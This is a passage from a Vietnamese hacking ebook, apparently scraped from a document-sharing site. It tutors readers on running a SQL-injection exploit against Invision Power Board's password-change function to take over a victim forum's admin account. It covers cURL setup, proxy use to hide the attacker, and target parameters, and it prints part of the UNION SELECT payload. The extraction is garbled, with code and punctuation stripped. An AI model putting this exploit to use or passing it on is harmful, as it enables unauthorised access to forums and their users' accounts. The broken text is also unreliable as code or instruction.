Tham khảo tài liệu 'hacker professional ebook part 213', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | cay thiệt Bước 4 Chuyện nhỏ View Source Find từ password nhìn sang bên cạnh cái j đây su_bo_thang_nao_hack_pass_ong Oài ghê thật Đấy pass nó đấy Dinhcaohack vniss Bàn thêm về Invision Power Board Password Change SQL-Injection Trước tiên các bạn có thể xem Vuln và Exploit tại đây https xforce t 253 Exploit người ta cung cấp nói chung là chính xác. Tuy nhiên tùy trường hợp cụ thể mà có thể phải chỉnh sửa lại đôi chút. Trước tiên là cài đặt curl. Nếu bạn nào đã từng cài PHP trên local host thì việc thêm module curl chỉ đơn giản là vào file bỏ đi comment ở dòng PHP Code extension thành PHP Code extension sau đó chạy tạo file có nội dung PHP Code phpinfo rồi run thử nếu thấy HTML Code curl CURL support enabled CURL Information libcurl OpenSSL zlib thì nghĩa là đã cài thành công cURL. Bây giờ bàn về cái exploit Lỗi trước tiên nhiều bạn gặp phải là để nguyên cái dòng này PHP Code proxy . . - your socks 4 5-proxy bạn phải chỉnh lại để dùng 1 proxy còn sống nếu không thích dùng proxy thì tìm đến dòng PHP Code curl_setopt ch CURLOPT_PROXY proxy curl_setopt ch CURLOPT_PROXYtYpE CuRLPROXY_SOCKS5 xóa hoặc comment nó lai. Tiếp theo là các thông số PHP Code host http forum - target forum login nothingtolosed tên người dùng password 123456 pasword cook_name topicsread cookie name tìm trong file cookie của diễn đàn vic tim để biết tên chính xác topic 1 một id của topic có thật target 1 id của admin victim cookie_file_path C một file có thể ghi đè trên máy của mình để module cURL sử dụng Bây giờ đến phần chính PHP Code sent 61 3A 32 3A 7B 73 3A if ver 1 exp - 999 UNION SELECT 0 vid null open 0 1 1132440935 1 11132440935 0 n ull nu 11 0 0 2 2 1 0 0 0 0 0 1 0 0 0 0 0 0 from . pref. validating where member_id . ta rget. LIMIT 1 else exp - 999 UNION SELECT 0 vid null open 0 1 1132440935 1 11132440935 0 n ull nu ll 0 0 2 2 1 0 0 null null 0 0 1 0 from . pref. .